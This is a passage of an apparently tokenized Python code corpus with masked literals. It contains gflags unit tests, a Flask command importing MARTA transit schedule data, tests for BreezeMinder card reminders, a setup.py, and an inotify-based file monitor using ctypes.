<NUM_LIT:0> ] ) <EOL> global_dict = { } <EOL> module_bar . ExecuteCode ( code , global_dict ) <EOL> self . assertEqual ( <EOL> global_dict [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' ) <EOL> def test_GetCallingModuleWithIteritemsError ( self ) : <EOL> orig_sys_modules = sys . modules <EOL> class SysModulesMock ( dict ) : <EOL> def __init__ ( self , original_content ) : <EOL> dict . __init__ ( self , original_content ) <EOL> def iteritems ( self ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> sys . modules = SysModulesMock ( orig_sys_modules ) <EOL> try : <EOL> self . assertEqual ( gflags . _GetCallingModule ( ) , sys . argv [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( <EOL> module_foo . GetModuleName ( ) , <EOL> '<STR_LIT>' ) <EOL> finally : <EOL> sys . modules = orig_sys_modules <EOL> class FlagsErrorMessagesTest ( googletest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . flag_values = gflags . FlagValues ( ) <EOL> self . flag_values . 
UseGnuGetOpt ( False ) <EOL> def testIntegerErrorText ( self ) : <EOL> gflags . DEFINE_integer ( '<STR_LIT>' , <NUM_LIT:4> , '<STR_LIT>' , lower_bound = <NUM_LIT:1> , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_integer ( '<STR_LIT>' , <NUM_LIT:4> , '<STR_LIT>' , lower_bound = <NUM_LIT:0> , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_integer ( '<STR_LIT>' , - <NUM_LIT:4> , '<STR_LIT>' , upper_bound = - <NUM_LIT:1> , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_integer ( '<STR_LIT>' , - <NUM_LIT:4> , '<STR_LIT>' , upper_bound = <NUM_LIT:0> , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_integer ( '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' , lower_bound = <NUM_LIT:4> , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_integer ( '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT>' , upper_bound = <NUM_LIT:4> , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_integer ( '<STR_LIT>' , <NUM_LIT:4> , '<STR_LIT>' , lower_bound = <NUM_LIT:0> , <EOL> upper_bound = <NUM_LIT> , flag_values = self . flag_values ) <EOL> gflags . DEFINE_integer ( '<STR_LIT>' , <NUM_LIT:0> , '<STR_LIT>' , lower_bound = - <NUM_LIT:1> , <EOL> upper_bound = <NUM_LIT:1> , flag_values = self . flag_values ) <EOL> self . _CheckErrorMessage ( '<STR_LIT>' , - <NUM_LIT:4> , '<STR_LIT>' ) <EOL> self . _CheckErrorMessage ( '<STR_LIT>' , - <NUM_LIT:4> , '<STR_LIT>' ) <EOL> self . _CheckErrorMessage ( '<STR_LIT>' , <NUM_LIT:0> , '<STR_LIT>' ) <EOL> self . _CheckErrorMessage ( '<STR_LIT>' , <NUM_LIT:4> , '<STR_LIT>' ) <EOL> self . _CheckErrorMessage ( '<STR_LIT>' , - <NUM_LIT:4> , '<STR_LIT>' ) <EOL> self . _CheckErrorMessage ( '<STR_LIT>' , <NUM_LIT:4> , <EOL> '<STR_LIT>' ) <EOL> self . _CheckErrorMessage ( '<STR_LIT>' , - <NUM_LIT:5> , '<STR_LIT>' ) <EOL> self . _CheckErrorMessage ( '<STR_LIT>' , <NUM_LIT:5> , '<STR_LIT>' ) <EOL> def testFloatErrorText ( self ) : <EOL> gflags . 
DEFINE_float ( '<STR_LIT>' , <NUM_LIT:4> , '<STR_LIT>' , lower_bound = <NUM_LIT:1> , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_float ( '<STR_LIT>' , <NUM_LIT:4> , '<STR_LIT>' , lower_bound = <NUM_LIT:0> , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_float ( '<STR_LIT>' , - <NUM_LIT:4> , '<STR_LIT>' , upper_bound = - <NUM_LIT:1> , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_float ( '<STR_LIT>' , - <NUM_LIT:4> , '<STR_LIT>' , upper_bound = <NUM_LIT:0> , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_float ( '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' , lower_bound = <NUM_LIT:4> , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_float ( '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT>' , upper_bound = <NUM_LIT:4> , <EOL> flag_values = self . flag_values ) <EOL> gflags . DEFINE_float ( '<STR_LIT>' , <NUM_LIT:4> , '<STR_LIT>' , lower_bound = <NUM_LIT:0> , <EOL> upper_bound = <NUM_LIT> , flag_values = self . flag_values ) <EOL> gflags . DEFINE_float ( '<STR_LIT>' , <NUM_LIT:0> , '<STR_LIT>' , lower_bound = - <NUM_LIT:1> , <EOL> upper_bound = <NUM_LIT:1> , flag_values = self . flag_values ) <EOL> self . _CheckErrorMessage ( '<STR_LIT>' , <NUM_LIT:0.5> , '<STR_LIT>' ) <EOL> self . _CheckErrorMessage ( '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT>' ) <EOL> self . _CheckErrorMessage ( '<STR_LIT>' , <NUM_LIT:0.5> , '<STR_LIT>' ) <EOL> self . _CheckErrorMessage ( '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' ) <EOL> self . _CheckErrorMessage ( '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT>' ) <EOL> self . _CheckErrorMessage ( '<STR_LIT>' , <NUM_LIT> , <EOL> '<STR_LIT>' ) <EOL> self . _CheckErrorMessage ( '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' ) <EOL> def _CheckErrorMessage ( self , flag_name , flag_value , expected_message_suffix ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self . flag_values . __setattr__ ( flag_name , flag_value ) <EOL> raise AssertionError ( '<STR_LIT>' ) <EOL> except gflags . 
IllegalFlagValue , e : <EOL> expected = ( '<STR_LIT>' % <EOL> { '<STR_LIT:name>' : flag_name , '<STR_LIT:value>' : flag_value , <EOL> '<STR_LIT>' : expected_message_suffix } ) <EOL> self . assertEquals ( str ( e ) , expected ) <EOL> def main ( ) : <EOL> googletest . main ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import csv <EOL> import os <EOL> import sys <EOL> from dateutil . parser import parse as parse_date <EOL> from flask . ext . script import Command , Option <EOL> from breezeminder . models . marta import ( Route , <EOL> Schedule , <EOL> Shape , <EOL> Stop , <EOL> Trip , <EOL> ScheduledStop ) <EOL> class ImportMartaData ( Command ) : <EOL> """<STR_LIT>""" <EOL> FILES = { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> } <EOL> PROCESSING_ORDER = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> def get_options ( self ) : <EOL> return [ <EOL> Option ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , required = True , <EOL> help = '<STR_LIT>' ) , <EOL> Option ( '<STR_LIT>' , dest = '<STR_LIT>' , action = '<STR_LIT:store_true>' , default = False , <EOL> help = '<STR_LIT>' ) , <EOL> ] <EOL> def run ( self , ** kwargs ) : <EOL> self . dirname = os . path . expanduser ( kwargs [ '<STR_LIT>' ] ) <EOL> if not os . path . exists ( self . dirname ) : <EOL> sys . exit ( '<STR_LIT>' ) <EOL> if kwargs . get ( '<STR_LIT>' , False ) : <EOL> print '<STR_LIT>' <EOL> self . do_clear ( ) <EOL> self . do_import ( ** kwargs ) <EOL> def do_clear ( self ) : <EOL> Trip . objects . delete ( ) <EOL> Stop . objects . delete ( ) <EOL> Shape . objects . delete ( ) <EOL> Schedule . objects . delete ( ) <EOL> Route . objects . delete ( ) <EOL> ScheduledStop . objects . delete ( ) <EOL> def do_import ( self , ** kwargs ) : <EOL> print '<STR_LIT>' <EOL> for filename in self . FILES : <EOL> fullname = os . path . join ( self . dirname , '<STR_LIT>' % filename ) <EOL> print fullname <EOL> if not os . path . exists ( fullname ) : <EOL> sys . exit ( '<STR_LIT>' % fullname ) <EOL> self . FILES [ filename ] = csv . 
DictReader ( open ( fullname , '<STR_LIT:r>' ) ) <EOL> print '<STR_LIT>' <EOL> for name in self . PROCESSING_ORDER : <EOL> print '<STR_LIT>' % name <EOL> getattr ( self , '<STR_LIT>' % name ) ( self . FILES [ name ] , ** kwargs ) <EOL> def allcaps ( self , string ) : <EOL> return '<STR_LIT:U+0020>' . join ( map ( lambda x : x . capitalize ( ) , string . split ( '<STR_LIT:U+0020>' ) ) ) <EOL> def create_routes ( self , data , ** kwargs ) : <EOL> for row in data : <EOL> try : <EOL> id = int ( row [ '<STR_LIT>' ] ) <EOL> except ValueError : <EOL> print '<STR_LIT>' % row <EOL> continue <EOL> try : <EOL> type = int ( row [ '<STR_LIT>' ] ) <EOL> except ValueError : <EOL> type = <NUM_LIT:0> <EOL> try : <EOL> Route ( id = id , <EOL> name = self . allcaps ( row [ '<STR_LIT>' ] ) , <EOL> description = self . allcaps ( row [ '<STR_LIT>' ] ) , <EOL> type = type , <EOL> color = row [ '<STR_LIT>' ] ) . save ( ) <EOL> except : <EOL> print '<STR_LIT>' <EOL> continue <EOL> def create_calendar ( self , data , ** kwargs ) : <EOL> for row in data : <EOL> try : <EOL> id = int ( row [ '<STR_LIT>' ] ) <EOL> except ValueError : <EOL> print '<STR_LIT>' % row <EOL> continue <EOL> begin , end = None , None <EOL> if row [ '<STR_LIT>' ] : <EOL> begin = parse_date ( row [ '<STR_LIT>' ] ) <EOL> if row [ '<STR_LIT>' ] : <EOL> end = parse_date ( row [ '<STR_LIT>' ] ) <EOL> defaults = { <EOL> '<STR_LIT>' : begin , <EOL> '<STR_LIT:end>' : end <EOL> } <EOL> for dow in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> defaults [ dow ] = str ( row [ dow ] ) == '<STR_LIT:1>' <EOL> try : <EOL> Schedule ( id = id , ** defaults ) . 
save ( ) <EOL> except : <EOL> print '<STR_LIT>' <EOL> continue <EOL> def create_shapes ( self , data , ** kwargs ) : <EOL> shapes = { } <EOL> for row in data : <EOL> try : <EOL> id = int ( row [ '<STR_LIT>' ] ) <EOL> except ValueError : <EOL> print '<STR_LIT>' % row <EOL> continue <EOL> if id not in shapes : <EOL> shapes [ id ] = [ ] <EOL> try : <EOL> lat = float ( row [ '<STR_LIT>' ] ) <EOL> lng = float ( row [ '<STR_LIT>' ] ) <EOL> except ValueError : <EOL> print '<STR_LIT>' % row <EOL> continue <EOL> shapes [ id ] . append ( ( lat , lng ) ) <EOL> for id , points in shapes . iteritems ( ) : <EOL> try : <EOL> Shape ( id = id , points = points ) . save ( ) <EOL> except : <EOL> print '<STR_LIT>' <EOL> continue <EOL> def create_stops ( self , data , ** kwargs ) : <EOL> self . stop_locations = { } <EOL> for row in data : <EOL> try : <EOL> id = int ( row [ '<STR_LIT>' ] ) <EOL> except ValueError : <EOL> print '<STR_LIT>' % row <EOL> try : <EOL> lat = float ( row [ '<STR_LIT>' ] ) <EOL> lng = float ( row [ '<STR_LIT>' ] ) <EOL> except ValueError : <EOL> print '<STR_LIT>' % row <EOL> continue <EOL> self . stop_locations [ id ] = ( lat , lng ) <EOL> defaults = { <EOL> '<STR_LIT:code>' : row [ '<STR_LIT>' ] , <EOL> '<STR_LIT:name>' : self . allcaps ( row [ '<STR_LIT>' ] ) , <EOL> '<STR_LIT:description>' : self . allcaps ( row [ '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : ( lat , lng ) <EOL> } <EOL> try : <EOL> Stop ( id = id , ** defaults ) . save ( ) <EOL> except : <EOL> print '<STR_LIT>' <EOL> continue <EOL> def create_stop_times ( self , data , ** kwargs ) : <EOL> count = <NUM_LIT:0> <EOL> for row in data : <EOL> if count % <NUM_LIT:1000> == <NUM_LIT:0> : <EOL> print '<STR_LIT>' % count <EOL> count += <NUM_LIT:1> <EOL> try : <EOL> trip_id = int ( row [ '<STR_LIT>' ] ) <EOL> stop_id = int ( row [ '<STR_LIT>' ] ) <EOL> except ValueError : <EOL> print '<STR_LIT>' % row <EOL> continue <EOL> try : <EOL> route_id = self . 
trip_mapping [ trip_id ] [ '<STR_LIT>' ] <EOL> schedule_id = self . trip_mapping [ trip_id ] [ '<STR_LIT>' ] <EOL> direction = self . trip_mapping [ trip_id ] [ '<STR_LIT>' ] <EOL> headsign = self . trip_mapping [ trip_id ] [ '<STR_LIT>' ] <EOL> block = self . trip_mapping [ trip_id ] [ '<STR_LIT>' ] <EOL> except ( AttributeError , KeyError ) : <EOL> print '<STR_LIT>' % row <EOL> continue <EOL> try : <EOL> seq = int ( row [ '<STR_LIT>' ] ) <EOL> except ValueError : <EOL> seq = <NUM_LIT:0> <EOL> try : <EOL> dist = float ( row [ '<STR_LIT>' ] ) <EOL> except ValueError : <EOL> dist = <NUM_LIT:0.0> <EOL> parts = row [ '<STR_LIT>' ] . split ( '<STR_LIT::>' ) <EOL> time = ( int ( parts [ <NUM_LIT:0> ] ) * <NUM_LIT> ) + ( int ( parts [ <NUM_LIT:1> ] ) * <NUM_LIT> ) + int ( parts [ <NUM_LIT:2> ] ) <EOL> try : <EOL> ScheduledStop ( route_id = route_id , <EOL> schedule_id = schedule_id , <EOL> trip_id = trip_id , <EOL> stop_id = stop_id , <EOL> arrival = time , <EOL> location = self . stop_locations [ stop_id ] , <EOL> shape_distance = dist , <EOL> pickup_type = row [ '<STR_LIT>' ] , <EOL> dropoff_type = row [ '<STR_LIT>' ] , <EOL> direction = direction , <EOL> headsign = headsign , <EOL> sequence = seq ) . save ( ) <EOL> except : <EOL> print '<STR_LIT>' <EOL> continue <EOL> def create_trips ( self , data , ** kwargs ) : <EOL> self . trip_mapping = { } <EOL> count = <NUM_LIT:0> <EOL> for row in data : <EOL> if count % <NUM_LIT> == <NUM_LIT:0> : <EOL> print '<STR_LIT>' % count <EOL> count += <NUM_LIT:1> <EOL> try : <EOL> route_id = int ( row [ '<STR_LIT>' ] ) <EOL> svc_id = int ( row [ '<STR_LIT>' ] ) <EOL> trip_id = int ( row [ '<STR_LIT>' ] ) <EOL> shape_id = int ( row [ '<STR_LIT>' ] ) <EOL> self . 
trip_mapping [ trip_id ] = { <EOL> '<STR_LIT>' : route_id , <EOL> '<STR_LIT>' : svc_id , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] , <EOL> } <EOL> except ValueError : <EOL> print '<STR_LIT>' % row <EOL> continue <EOL> try : <EOL> route = Route . objects . get ( id = route_id ) <EOL> except Route . DoesNotExist : <EOL> print '<STR_LIT>' % route_id <EOL> continue <EOL> try : <EOL> schedule = Schedule . objects . get ( id = svc_id ) <EOL> except Schedule . DoesNotExist : <EOL> print '<STR_LIT>' % svc_id <EOL> schedule = None <EOL> try : <EOL> shape = Shape . objects . get ( id = shape_id ) <EOL> except Shape . DoesNotExist : <EOL> print '<STR_LIT>' % shape_id <EOL> shape = None <EOL> defaults = { <EOL> '<STR_LIT>' : route , <EOL> '<STR_LIT>' : schedule , <EOL> '<STR_LIT>' : shape , <EOL> '<STR_LIT>' : self . allcaps ( row [ '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] <EOL> } <EOL> try : <EOL> Trip ( id = trip_id , ** defaults ) . save ( ) <EOL> except : <EOL> print '<STR_LIT>' <EOL> continue </s>
<s> from copy import deepcopy <EOL> from datetime import datetime <EOL> from dateutil . relativedelta import relativedelta <EOL> from mock import Mock <EOL> from unittest2 import TestCase <EOL> from breezeminder . models . reminder import Reminder <EOL> from breezeminder . util . testing import silence_is_golden <EOL> class ReminderTestCase ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . bal_rem = Reminder ( type = '<STR_LIT>' , threshold = <NUM_LIT> ) <EOL> self . exp_rem = Reminder ( type = '<STR_LIT>' , threshold = <NUM_LIT:2> , quantifier = '<STR_LIT>' ) <EOL> self . ride_rem = Reminder ( type = '<STR_LIT>' , threshold = <NUM_LIT:5> ) <EOL> self . round_trip_rem = Reminder ( type = '<STR_LIT>' , threshold = <NUM_LIT:3> ) <EOL> self . card = Mock ( ) <EOL> self . card . expiration_date = datetime ( year = <NUM_LIT> , month = <NUM_LIT:12> , day = <NUM_LIT:2> ) <EOL> self . card . stored_value = <NUM_LIT:1> <EOL> self . card . products = [ ] <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT:4> ) : <EOL> prod = Mock ( ) <EOL> prod . name = '<STR_LIT>' % i <EOL> prod . expiration_date = datetime ( year = <NUM_LIT> , month = <NUM_LIT:12> , day = i ) <EOL> prod . remaining_rides = i <EOL> self . card . products . append ( prod ) <EOL> def test_description ( self ) : <EOL> self . assertIn ( '<STR_LIT>' , self . bal_rem . description ( html = False ) ) <EOL> self . assertIn ( '<STR_LIT>' , self . bal_rem . description ( html = False ) ) <EOL> self . assertIn ( '<STR_LIT>' , self . ride_rem . description ( html = False ) ) <EOL> self . assertIn ( '<STR_LIT>' , self . exp_rem . description ( html = False ) ) <EOL> @ silence_is_golden <EOL> def test_check_reminder_invalids ( self , * args ) : <EOL> self . bal_rem . valid_until = datetime ( year = <NUM_LIT> , month = <NUM_LIT:12> , day = <NUM_LIT:2> ) <EOL> self . assertFalse ( self . bal_rem . check_reminder ( Mock ( ) ) ) <EOL> @ silence_is_golden <EOL> def test_check_balance_reminder ( self , * args ) : <EOL> self . 
card . stored_value = <NUM_LIT> <EOL> self . assertTrue ( self . bal_rem . _check_balance_reminder ( self . card ) ) <EOL> last_state = deepcopy ( self . card ) <EOL> self . assertFalse ( self . bal_rem . _check_balance_reminder ( self . card , last_state ) ) <EOL> self . card . stored_value = <NUM_LIT> <EOL> self . assertTrue ( self . bal_rem . _check_balance_reminder ( self . card , last_state ) ) <EOL> self . card . stored_value = <NUM_LIT> <EOL> self . assertFalse ( self . bal_rem . _check_balance_reminder ( self . card ) ) <EOL> self . card . stored_value = '<STR_LIT:foo>' <EOL> self . assertFalse ( self . bal_rem . _check_balance_reminder ( self . card ) ) <EOL> @ silence_is_golden <EOL> def test_check_expiration_reminder ( self , * args ) : <EOL> now = datetime . now ( ) <EOL> for quant in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . exp_rem . quantifier = quant <EOL> self . exp_rem . threshold = <NUM_LIT:1> <EOL> self . assertFalse ( self . exp_rem . _check_expiration_reminder ( self . card ) ) <EOL> self . card . expiration_date = now + relativedelta ( ** { quant . lower ( ) : <NUM_LIT:1> } ) <EOL> self . assertTrue ( self . exp_rem . _check_expiration_reminder ( self . card ) ) <EOL> self . card . expiration_date = now + relativedelta ( ** { quant . lower ( ) : <NUM_LIT:1> } ) - relativedelta ( days = <NUM_LIT:1> ) <EOL> self . assertFalse ( self . exp_rem . _check_expiration_reminder ( self . card ) ) <EOL> self . card . expiration_date = now + relativedelta ( hours = <NUM_LIT:1> ) <EOL> self . assertFalse ( self . exp_rem . _check_expiration_reminder ( self . card ) ) <EOL> self . card . expiration_date = datetime ( year = <NUM_LIT> , month = <NUM_LIT:12> , day = <NUM_LIT> ) <EOL> for prod in self . card . products : <EOL> prod . expiration_date = now + relativedelta ( ** { quant . lower ( ) : <NUM_LIT:1> } ) <EOL> self . assertTrue ( self . exp_rem . _check_expiration_reminder ( self . 
card ) ) <EOL> @ silence_is_golden <EOL> def test_check_round_trip_reminder ( self , * args ) : <EOL> for prod in self . card . products : <EOL> prod . remaining_rides = <NUM_LIT:2> <EOL> self . assertTrue ( self . round_trip_rem . _check_round_trip_reminder ( self . card ) ) <EOL> last_state = deepcopy ( self . card ) <EOL> self . assertFalse ( self . round_trip_rem . _check_round_trip_reminder ( self . card , last_state = last_state ) ) <EOL> self . card . products [ <NUM_LIT:0> ] . remaining_rides = <NUM_LIT:1> <EOL> self . assertTrue ( self . round_trip_rem . _check_round_trip_reminder ( self . card , last_state = last_state ) ) <EOL> for prod in self . card . products : <EOL> prod . remaining_rides = <NUM_LIT> <EOL> self . assertFalse ( self . round_trip_rem . _check_round_trip_reminder ( self . card ) ) <EOL> @ silence_is_golden <EOL> def test_check_ride_reminder ( self , * args ) : <EOL> for prod in self . card . products : <EOL> prod . remaining_rides = <NUM_LIT:3> <EOL> self . assertTrue ( self . ride_rem . _check_ride_reminder ( self . card ) ) <EOL> last_state = deepcopy ( self . card ) <EOL> self . assertFalse ( self . ride_rem . _check_ride_reminder ( self . card , last_state = last_state ) ) <EOL> self . card . products [ <NUM_LIT:0> ] . remaining_rides = <NUM_LIT:2> <EOL> self . assertTrue ( self . ride_rem . _check_ride_reminder ( self . card , last_state = last_state ) ) <EOL> for prod in self . card . products : <EOL> prod . remaining_rides = <NUM_LIT> <EOL> self . assertFalse ( self . ride_rem . _check_ride_reminder ( self . card ) ) </s>
<s> from setuptools import setup , find_packages <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' , '<STR_LIT:r>' ) . read ( ) + open ( '<STR_LIT>' , '<STR_LIT:r>' ) . read ( ) + open ( '<STR_LIT>' , '<STR_LIT:r>' ) . read ( ) , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> packages = find_packages ( ) , <EOL> include_package_data = True , <EOL> test_suite = "<STR_LIT>" , <EOL> tests_require = [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> zip_safe = False , <EOL> ) </s>
<s> import os , struct , threading , errno , select <EOL> from ctypes import CDLL , CFUNCTYPE , POINTER , c_int , c_char_p , c_uint32 , get_errno <EOL> from . common import FSEvent , FSMonitorOSError <EOL> module_loaded = True <EOL> libc = CDLL ( "<STR_LIT>" ) <EOL> strerror = CFUNCTYPE ( c_char_p , c_int ) ( <EOL> ( "<STR_LIT>" , libc ) ) <EOL> inotify_init = CFUNCTYPE ( c_int , use_errno = True ) ( <EOL> ( "<STR_LIT>" , libc ) ) <EOL> inotify_add_watch = CFUNCTYPE ( c_int , c_int , c_char_p , c_uint32 , use_errno = True ) ( <EOL> ( "<STR_LIT>" , libc ) ) <EOL> inotify_rm_watch = CFUNCTYPE ( c_int , c_int , c_int , use_errno = True ) ( <EOL> ( "<STR_LIT>" , libc ) ) <EOL> IN_ACCESS = <NUM_LIT> <EOL> IN_MODIFY = <NUM_LIT> <EOL> IN_ATTRIB = <NUM_LIT> <EOL> IN_CLOSE_WRITE = <NUM_LIT> <EOL> IN_CLOSE_NOWRITE = <NUM_LIT> <EOL> IN_CLOSE = IN_CLOSE_WRITE | IN_CLOSE_NOWRITE <EOL> IN_OPEN = <NUM_LIT> <EOL> IN_MOVED_FROM = <NUM_LIT> <EOL> IN_MOVED_TO = <NUM_LIT> <EOL> IN_MOVE = IN_MOVED_FROM | IN_MOVED_TO <EOL> IN_CREATE = <NUM_LIT> <EOL> IN_DELETE = <NUM_LIT> <EOL> IN_DELETE_SELF = <NUM_LIT> <EOL> IN_MOVE_SELF = <NUM_LIT> <EOL> IN_UNMOUNT = <NUM_LIT> <EOL> IN_Q_OVERFLOW = <NUM_LIT> <EOL> IN_IGNORED = <NUM_LIT> <EOL> IN_ONLYDIR = <NUM_LIT> <EOL> IN_DONT_FOLLOW = <NUM_LIT> <EOL> IN_MASK_ADD = <NUM_LIT> <EOL> IN_ISDIR = <NUM_LIT> <EOL> IN_ONESHOT = <NUM_LIT> <EOL> action_map = { <EOL> IN_ACCESS : FSEvent . Access , <EOL> IN_MODIFY : FSEvent . Modify , <EOL> IN_ATTRIB : FSEvent . Attrib , <EOL> IN_MOVED_FROM : FSEvent . MoveFrom , <EOL> IN_MOVED_TO : FSEvent . MoveTo , <EOL> IN_CREATE : FSEvent . Create , <EOL> IN_DELETE : FSEvent . Delete , <EOL> IN_DELETE_SELF : FSEvent . DeleteSelf , <EOL> } <EOL> flags_map = { <EOL> FSEvent . Access : IN_ACCESS , <EOL> FSEvent . Modify : IN_MODIFY , <EOL> FSEvent . Attrib : IN_ATTRIB , <EOL> FSEvent . Create : IN_CREATE , <EOL> FSEvent . Delete : IN_DELETE , <EOL> FSEvent . DeleteSelf : IN_DELETE_SELF , <EOL> FSEvent . 
MoveFrom : IN_MOVED_FROM , <EOL> FSEvent . MoveTo : IN_MOVED_TO , <EOL> } <EOL> def convert_flags ( flags ) : <EOL> os_flags = <NUM_LIT:0> <EOL> flag = <NUM_LIT:1> <EOL> while flag < FSEvent . All + <NUM_LIT:1> : <EOL> if flags & flag : <EOL> os_flags |= flags_map [ flag ] <EOL> flag <<= <NUM_LIT:1> <EOL> return os_flags <EOL> def parse_events ( s ) : <EOL> i = <NUM_LIT:0> <EOL> while i + <NUM_LIT:16> < len ( s ) : <EOL> wd , mask , cookie , length = struct . unpack_from ( "<STR_LIT>" , s , i ) <EOL> name = s [ i + <NUM_LIT:16> : i + <NUM_LIT:16> + length ] . rstrip ( "<STR_LIT>" ) <EOL> i += <NUM_LIT:16> + length <EOL> yield wd , mask , cookie , name <EOL> class FSMonitorWatch ( object ) : <EOL> def __init__ ( self , wd , path , flags , user ) : <EOL> self . _wd = wd <EOL> self . path = path <EOL> self . flags = flags <EOL> self . user = user <EOL> self . enabled = True <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % self . path <EOL> class FSMonitor ( object ) : <EOL> def __init__ ( self ) : <EOL> fd = inotify_init ( ) <EOL> if fd == - <NUM_LIT:1> : <EOL> errno = get_errno ( ) <EOL> raise FSMonitorOSError ( errno , strerror ( errno ) ) <EOL> self . __fd = fd <EOL> self . __lock = threading . Lock ( ) <EOL> self . __wd_to_watch = { } <EOL> def __del__ ( self ) : <EOL> if module_loaded : <EOL> self . close ( ) <EOL> def close ( self ) : <EOL> if self . __fd is not None : <EOL> os . close ( self . __fd ) <EOL> self . __fd = None <EOL> def _add_watch ( self , path , flags , user , inotify_flags = <NUM_LIT:0> ) : <EOL> inotify_flags |= convert_flags ( flags ) | IN_DELETE_SELF <EOL> wd = inotify_add_watch ( self . __fd , path , inotify_flags ) <EOL> if wd == - <NUM_LIT:1> : <EOL> errno = get_errno ( ) <EOL> raise FSMonitorOSError ( errno , strerror ( errno ) ) <EOL> watch = FSMonitorWatch ( wd , path , flags , user ) <EOL> with self . __lock : <EOL> self . __wd_to_watch [ wd ] = watch <EOL> return watch <EOL> def add_dir_watch ( self , path , flags = FSEvent . 
All , user = None ) : <EOL> return self . _add_watch ( path , flags , user , IN_ONLYDIR ) <EOL> def add_file_watch ( self , path , flags = FSEvent . All , user = None ) : <EOL> return self . _add_watch ( path , flags , user ) <EOL> def remove_watch ( self , watch ) : <EOL> return inotify_rm_watch ( self . __fd , watch . _wd ) != - <NUM_LIT:1> <EOL> def remove_all_watches ( self ) : <EOL> with self . __lock : <EOL> for wd in self . __wd_to_watch . iterkeys ( ) : <EOL> inotify_rm_watch ( self . __fd , wd ) <EOL> def enable_watch ( self , watch , enable = True ) : <EOL> watch . enabled = enable <EOL> def disable_watch ( self , watch ) : <EOL> watch . enabled = False <EOL> def read_events ( self , timeout = None ) : <EOL> if timeout is not None : <EOL> rs , ws , xs = select . select ( [ self . __fd ] , [ ] , [ ] , timeout ) <EOL> if self . __fd not in rs : <EOL> return [ ] <EOL> while True : <EOL> try : <EOL> s = os . read ( self . __fd , <NUM_LIT> ) <EOL> break <EOL> except OSError as e : <EOL> if e . errno != errno . EINTR : <EOL> raise FSMonitorOSError ( * e . args ) <EOL> events = [ ] <EOL> if not module_loaded : <EOL> return events <EOL> for wd , mask , cookie , name in parse_events ( s ) : <EOL> with self . __lock : <EOL> watch = self . __wd_to_watch . get ( wd ) <EOL> if watch is not None and watch . enabled : <EOL> bit = <NUM_LIT:1> <EOL> while bit < <NUM_LIT> : <EOL> if mask & bit : <EOL> action = action_map . get ( bit ) <EOL> if action is not None and ( action & watch . flags ) : <EOL> events . append ( FSEvent ( watch , action , name ) ) <EOL> bit <<= <NUM_LIT:1> <EOL> if mask & IN_IGNORED : <EOL> with self . __lock : <EOL> try : <EOL> del self . __wd_to_watch [ wd ] <EOL> except KeyError : <EOL> pass <EOL> return events <EOL> @ property <EOL> def watches ( self ) : <EOL> with self . __lock : <EOL> return self . __wd_to_watch . values ( ) </s>
